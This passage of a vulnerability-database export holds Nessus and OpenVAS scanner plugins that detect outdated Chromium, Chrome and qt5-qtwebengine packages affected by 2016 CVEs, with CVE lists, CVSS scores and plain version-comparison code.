Anonymous\n\n- [630654] High CVE-2016-5184: Use after free in PDFium. Credit to Anonymous\n\n- [621360] High CVE-2016-5185: Use after free in Blink. Credit to cloudfuzzer\n\n- [639702] High CVE-2016-5187: URL spoofing. Credit to Luan Herrera\n\n- [565760] Medium CVE-2016-5188: UI spoofing. Credit to Luan Herrera\n\n- [633885] Medium CVE-2016-5192: Cross-origin bypass in Blink. Credit to haojunhou@gmail.com\n\n- [646278] Medium CVE-2016-5189: URL spoofing. Credit to xisigr of Tencent's Xuanwu Lab\n\n- [644963] Medium CVE-2016-5186: Out of bounds read in DevTools.\nCredit to Abdulrahman Alqabandi (@qab)\n\n- [639126] Medium CVE-2016-5191: Universal XSS in Bookmarks. Credit to Gareth Hughes\n\n- [642067] Medium CVE-2016-5190: Use after free in Internals. Credit to Atte Kettunen of OUSPG\n\n- [639658] Low CVE-2016-5193: Scheme bypass. Credit to Yuyang ZHOU (martinzhou96)\n\n- [654782] CVE-2016-5194: Various fixes from internal audits, fuzzing and other initiatives", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-01T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- multiple vulnerabilities (9118961b-9fa5-11e6-a265-3065ec8fd3ec)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5181", "CVE-2016-5182", "CVE-2016-5183", "CVE-2016-5184", "CVE-2016-5185", "CVE-2016-5186", "CVE-2016-5187", "CVE-2016-5188", "CVE-2016-5189", "CVE-2016-5190", "CVE-2016-5191", "CVE-2016-5192", "CVE-2016-5193", "CVE-2016-5194"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:chromium", "p-cpe:/a:freebsd:freebsd:chromium-npapi", "p-cpe:/a:freebsd:freebsd:chromium-pulse", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_9118961B9FA511E6A2653065EC8FD3EC.NASL", "href": "https://www.tenable.com/plugins/nessus/94450", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94450);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-5181\", \"CVE-2016-5182\", \"CVE-2016-5183\", \"CVE-2016-5184\", \"CVE-2016-5185\", \"CVE-2016-5186\", \"CVE-2016-5187\", \"CVE-2016-5188\", \"CVE-2016-5189\", \"CVE-2016-5190\", \"CVE-2016-5191\", \"CVE-2016-5192\", \"CVE-2016-5193\", \"CVE-2016-5194\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (9118961b-9fa5-11e6-a265-3065ec8fd3ec)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Google Chrome Releases reports :\n\n21 security fixes in this release, including :\n\n- [645211] High CVE-2016-5181: Universal XSS in Blink. Credit to\nAnonymous\n\n- [638615] High CVE-2016-5182: Heap overflow in Blink. Credit to Giwan\nGo of STEALIEN\n\n- [645122] High CVE-2016-5183: Use after free in PDFium. Credit to\nAnonymous\n\n- [630654] High CVE-2016-5184: Use after free in PDFium. Credit to\nAnonymous\n\n- [621360] High CVE-2016-5185: Use after free in Blink. Credit to\ncloudfuzzer\n\n- [639702] High CVE-2016-5187: URL spoofing. Credit to Luan Herrera\n\n- [565760] Medium CVE-2016-5188: UI spoofing. Credit to Luan Herrera\n\n- [633885] Medium CVE-2016-5192: Cross-origin bypass in Blink. Credit\nto haojunhou@gmail.com\n\n- [646278] Medium CVE-2016-5189: URL spoofing. Credit to xisigr of\nTencent's Xuanwu Lab\n\n- [644963] Medium CVE-2016-5186: Out of bounds read in DevTools.\nCredit to Abdulrahman Alqabandi (@qab)\n\n- [639126] Medium CVE-2016-5191: Universal XSS in Bookmarks. Credit to\nGareth Hughes\n\n- [642067] Medium CVE-2016-5190: Use after free in Internals. Credit\nto Atte Kettunen of OUSPG\n\n- [639658] Low CVE-2016-5193: Scheme bypass. Credit to Yuyang ZHOU\n(martinzhou96)\n\n- [654782] CVE-2016-5194: Various fixes from internal audits, fuzzing\nand other initiatives\"\n );\n # https://googlechromereleases.blogspot.nl/2016/10/stable-channel-update-for-desktop.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c9e51c7d\"\n );\n # https://vuxml.freebsd.org/freebsd/9118961b-9fa5-11e6-a265-3065ec8fd3ec.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?42812ef8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-npapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-pulse\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<54.0.2840.59\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-npapi<54.0.2840.59\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-pulse<54.0.2840.59\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:34:13", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-04-18T00:00:00", "type": "openvas", "title": "Fedora Update for qt5-qtwebengine FEDORA-2017-ae1fde5fb8", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5183", "CVE-2016-5182", "CVE-2016-5208", "CVE-2016-5217", "CVE-2016-9651", "CVE-2016-5211", "CVE-2016-9650", "CVE-2016-5222", "CVE-2016-5189", "CVE-2016-5205", "CVE-2016-5221", "CVE-2016-5219", "CVE-2016-5216", "CVE-2016-5207", "CVE-2016-5215", "CVE-2016-5218", "CVE-2016-5203", "CVE-2016-5213", "CVE-2016-5212", "CVE-2016-5214", "CVE-2016-5223", "CVE-2016-5206", "CVE-2016-5210", "CVE-2016-5199", "CVE-2016-5201", "CVE-2016-5204"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872576", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872576", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for qt5-qtwebengine FEDORA-2017-ae1fde5fb8\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872576\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-18 06:41:53 +0200 (Tue, 18 Apr 2017)\");\n script_cve_id(\"CVE-2016-5182\", \"CVE-2016-5183\", \"CVE-2016-5189\", \"CVE-2016-5199\",\n \"CVE-2016-5201\", \"CVE-2016-5203\", \"CVE-2016-5204\", \"CVE-2016-5205\",\n \"CVE-2016-5206\", \"CVE-2016-5208\", \"CVE-2016-5207\", \"CVE-2016-5210\",\n \"CVE-2016-5211\", \"CVE-2016-5212\", \"CVE-2016-5213\", \"CVE-2016-5214\",\n \"CVE-2016-5215\", \"CVE-2016-5216\", \"CVE-2016-5217\", \"CVE-2016-5218\",\n \"CVE-2016-5219\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5223\",\n \"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-9650\", \"CVE-2016-9651\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for qt5-qtwebengine FEDORA-2017-ae1fde5fb8\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'qt5-qtwebengine'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"qt5-qtwebengine on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-ae1fde5fb8\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OMW5DLNYQFXDPKYD4LA66HQALQTPX54B\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"qt5-qtwebengine\", rpm:\"qt5-qtwebengine~5.8.0~8.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-22T16:37:23", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-12-05T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop-2016-12)-Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5208", "CVE-2016-5217", "CVE-2016-9651", "CVE-2016-5211", "CVE-2016-9652", "CVE-2016-9650", "CVE-2016-5222", "CVE-2016-5209", "CVE-2016-5205", "CVE-2016-5221", "CVE-2016-5220", "CVE-2016-5219", "CVE-2016-5216", "CVE-2016-5207", "CVE-2016-5215", "CVE-2016-5218", "CVE-2016-5203", "CVE-2016-5213", "CVE-2016-5212", "CVE-2016-5214", "CVE-2016-5223", "CVE-2016-5206", "CVE-2016-5210", "CVE-2016-5204", "CVE-2016-5226"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310810229", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810229", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop-2016-12)-Linux\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810229\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2016-9651\", \"CVE-2016-5208\", \"CVE-2016-5207\", \"CVE-2016-5206\",\n \"CVE-2016-5205\", \"CVE-2016-5204\", \"CVE-2016-5209\", \"CVE-2016-5203\",\n \"CVE-2016-5210\", \"CVE-2016-5212\", \"CVE-2016-5211\", \"CVE-2016-5213\",\n \"CVE-2016-5214\", \"CVE-2016-5216\", \"CVE-2016-5215\", \"CVE-2016-5217\",\n \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5221\", \"CVE-2016-5220\",\n \"CVE-2016-5222\", \"CVE-2016-9650\", \"CVE-2016-5223\", \"CVE-2016-5226\",\n \"CVE-2016-5225\", \"CVE-2016-5224\", \"CVE-2016-9652\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-12-05 12:51:42 +0530 (Mon, 05 Dec 2016)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop-2016-12)-Linux\");\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to,\n\n - A private property access error in V8.\n\n - The multiple universal XSS errors in Blink.\n\n - A same-origin bypass error in PDFium.\n\n - An out of bounds write error in Blink.\n\n - The multiple use after free errors.\n\n - An out of bounds write error in PDFium.\n\n - A local file disclosure error in DevTools.\n\n - A file download protection bypass error.\n\n - The usage of unvalidated data in PDFium.\n\n - The multiple address spoofing errors in Omnibox.\n\n - An integer overflow error in ANGLE.\n\n - A local file access error in PDFium.\n\n - A CSP Referrer disclosure error.\n\n - An integer overflow error in PDFium.\n\n - A CSP bypass error in Blink.\n\n - A same-origin bypass error in SVG.\n\n - The various fixes from internal audits, fuzzing and other initiatives.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to bypass security, obtain\n sensitive information and to execute arbitrary code or cause denial of service\n condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 55.0.2883.75 on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 55.0.2883.75 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://googlechromereleases.blogspot.in/2016/12/stable-channel-update-for-desktop.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chr_ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chr_ver, test_version:\"55.0.2883.75\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"55.0.2883.75\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-22T16:36:46", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-12-05T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop-2016-12)-MAC OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5208", "CVE-2016-5217", "CVE-2016-9651", "CVE-2016-5211", "CVE-2016-9652", "CVE-2016-9650", "CVE-2016-5222", "CVE-2016-5209", "CVE-2016-5205", "CVE-2016-5221", "CVE-2016-5220", "CVE-2016-5219", "CVE-2016-5216", "CVE-2016-5207", "CVE-2016-5215", "CVE-2016-5218", "CVE-2016-5203", "CVE-2016-5213", "CVE-2016-5212", "CVE-2016-5214", "CVE-2016-5223", "CVE-2016-5206", "CVE-2016-5210", "CVE-2016-5204", "CVE-2016-5226"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310810230", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810230", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop-2016-12)-MAC OS X\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810230\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2016-9651\", \"CVE-2016-5208\", \"CVE-2016-5207\", \"CVE-2016-5206\",\n \"CVE-2016-5205\", \"CVE-2016-5204\", \"CVE-2016-5209\", \"CVE-2016-5203\",\n \"CVE-2016-5210\", \"CVE-2016-5212\", \"CVE-2016-5211\", \"CVE-2016-5213\",\n \"CVE-2016-5214\", \"CVE-2016-5216\", \"CVE-2016-5215\", \"CVE-2016-5217\",\n \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5221\", \"CVE-2016-5220\",\n \"CVE-2016-5222\", \"CVE-2016-9650\", \"CVE-2016-5223\", \"CVE-2016-5226\",\n \"CVE-2016-5225\", \"CVE-2016-5224\", \"CVE-2016-9652\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-12-05 12:51:42 +0530 (Mon, 05 Dec 2016)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop-2016-12)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to,\n\n - A private property access error in V8.\n\n - The multiple universal XSS errors in Blink.\n\n - A same-origin bypass error in PDFium.\n\n - An out of bounds write error in Blink.\n\n - The multiple use after free errors.\n\n - An out of bounds write error in PDFium.\n\n - A local file disclosure error in DevTools.\n\n - A file download protection bypass error.\n\n - The usage of unvalidated data in PDFium.\n\n - The multiple address spoofing errors in Omnibox.\n\n - An integer overflow error in ANGLE.\n\n - A local file access error in PDFium.\n\n - A CSP Referrer disclosure error.\n\n - An integer overflow error in PDFium.\n\n - A CSP bypass error in Blink.\n\n - A same-origin bypass error in SVG.\n\n - The various fixes from internal audits, fuzzing and other initiatives.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to bypass security, obtain\n sensitive information and to execute arbitrary code or cause denial of service\n condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 55.0.2883.75 on MAC OS X\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version 55.0.2883.75 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://googlechromereleases.blogspot.in/2016/12/stable-channel-update-for-desktop.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chr_ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chr_ver, test_version:\"55.0.2883.75\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"55.0.2883.75\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-22T16:36:36", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-12-05T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop-2016-12)-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5208", "CVE-2016-5217", "CVE-2016-9651", "CVE-2016-5211", "CVE-2016-9652", "CVE-2016-9650", "CVE-2016-5222", "CVE-2016-5209", "CVE-2016-5205", "CVE-2016-5221", "CVE-2016-5220", "CVE-2016-5219", "CVE-2016-5216", "CVE-2016-5207", "CVE-2016-5215", "CVE-2016-5218", "CVE-2016-5203", "CVE-2016-5213", "CVE-2016-5212", "CVE-2016-5214", "CVE-2016-5223", "CVE-2016-5206", "CVE-2016-5210", "CVE-2016-5204", "CVE-2016-5226"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310810228", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810228", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop-2016-12)-Windows\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810228\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2016-9651\", \"CVE-2016-5208\", \"CVE-2016-5207\", \"CVE-2016-5206\",\n \"CVE-2016-5205\", \"CVE-2016-5204\", \"CVE-2016-5209\", \"CVE-2016-5203\",\n \"CVE-2016-5210\", \"CVE-2016-5212\", \"CVE-2016-5211\", \"CVE-2016-5213\",\n \"CVE-2016-5214\", \"CVE-2016-5216\", \"CVE-2016-5215\", \"CVE-2016-5217\",\n \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5221\", \"CVE-2016-5220\",\n \"CVE-2016-5222\", \"CVE-2016-9650\", \"CVE-2016-5223\", \"CVE-2016-5226\",\n \"CVE-2016-5225\", \"CVE-2016-5224\", \"CVE-2016-9652\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-12-05 12:51:42 +0530 (Mon, 05 Dec 2016)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop-2016-12)-Windows\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to,\n\n - A private property access error in V8.\n\n - The multiple universal XSS errors in Blink.\n\n - A same-origin bypass error in PDFium.\n\n - An out of bounds write error in Blink.\n\n - The multiple use after free errors.\n\n - An out of bounds write error in PDFium.\n\n - A local file disclosure error in DevTools.\n\n - A file download protection bypass error.\n\n - The usage of unvalidated data in PDFium.\n\n - The multiple address spoofing errors in Omnibox.\n\n - An integer overflow error in ANGLE.\n\n - A local file access error in PDFium.\n\n - A CSP Referrer disclosure error.\n\n - An integer overflow error in PDFium.\n\n - A CSP bypass error in Blink.\n\n - A same-origin bypass error in SVG.\n\n - The various fixes from internal audits, fuzzing and other initiatives.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to bypass security, obtain\n sensitive information and to execute arbitrary code or cause denial of service\n condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 55.0.2883.75 on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version 55.0.2883.75 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://googlechromereleases.blogspot.in/2016/12/stable-channel-update-for-desktop.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n 